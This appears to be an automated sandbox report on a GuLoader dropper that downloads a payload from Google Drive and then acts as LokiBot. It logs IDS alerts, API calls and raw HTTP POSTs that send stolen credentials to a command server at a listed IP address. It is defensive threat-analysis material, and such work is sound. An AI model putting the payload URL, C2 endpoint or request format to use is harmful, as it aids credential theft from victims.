Source: 00000006.00000002.411449067.00000000080A0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF"} |
Source: lzJWJgZhPc.exe | ReversingLabs: Detection: 39% |
Source: http://63.250.34.171/tickets.php?id=277 | Avira URL Cloud: Label: malware |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Joe Sandbox ML: detected |
Source: lzJWJgZhPc.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED |
Source: unknown | HTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 142.250.180.161:443 -> 192.168.2.3:49760 version: TLS 1.2 |
Source: lzJWJgZhPc.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406873 FindFirstFileW,FindClose, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040290B FindFirstFileW, |
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49761 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49762 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Traffic | Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49773 -> 63.250.34.171:80 |
Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=1CVReMZqOnEVXpF |
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 63.250.34.171 |
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idfnisv3ndpp2nat5to25uprreq/1638425325000/03026244708369606156/*/1CVReMZqOnEVXpFs65OM8v3lOQDCXMaKB?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-00-50-docs.googleusercontent.com Connection: Keep-Alive |
Source: global traffic | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 190 Connection: close |
Source: global traffic | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 163 Connection: close |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49760 |
Source: unknown | Network traffic detected: HTTP traffic on port 49760 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:39 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:43 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 06:09:46 GMT Server: Apache/2.4.38 (Debian) Content-Length: 287 Connection: close Content-Type: text/html; charset=UTF-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html> |
Source: unknown | TCP traffic detected without corresponding DNS query: 63.250.34.171 |
Source: Form_Sporogeni.exe, 0000000C.00000002.524923598.000000001E706000.00000004.00000001.sdmp | String found in binary or memory: http://63.250.34.171/tickets.php?id=277 |
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: lzJWJgZhPc.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: Form_Sporogeni.exe, 0000000C.00000003.497554994.000000000097A000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524994253.000000001E756000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498697620.0000000000979000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp, Form_Sporogeni.exe, 0000000C.00000003.498525929.0000000000977000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/ |
Source: Form_Sporogeni.exe, 0000000C.00000002.524944806.000000001E719000.00000004.00000001.sdmp | String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/bvmn5idf |
Source: unknown | HTTP traffic detected: POST /tickets.php?id=277 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.250.34.171 Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AA495C78 Content-Length: 190 Connection: close |
Source: unknown | DNS traffic detected: queries for: drive.google.com |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_0040755C |
Source: C:\Users\user\Desktop\lzJWJgZhPc.exe | Code function: 1_2_00406D85 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AF4FC |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B06 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0D7B |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3A1A |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1A1E |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A743B |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9E50 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1E7F |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB8C3 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A32FB |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A3318 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0524 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1B30 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0166 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0564 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A0393 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A05AA |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A1BC9 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A17CF |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080AB5C0 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A55E9 |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A19EC |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A78B1 NtWriteVirtualMemory,LoadLibraryA, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 6_2_080A9950 NtAllocateVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570204 LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703C8 Sleep,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570212 LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702DD NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005702C4 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CD LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005701CB LdrInitializeThunk,NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570479 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_00570423 NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Code function: 12_2_005703ED NtProtectVirtualMemory, |
Source: C:\Users\user\AppData\Local\Temp\Form_Sporogeni.exe | Process Stats: CPU usage > 98% |
Source: lzJWJgZhPc.exe, 00000001.00000002.299514998.0000000000428000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameForm_Sporogeni.exe |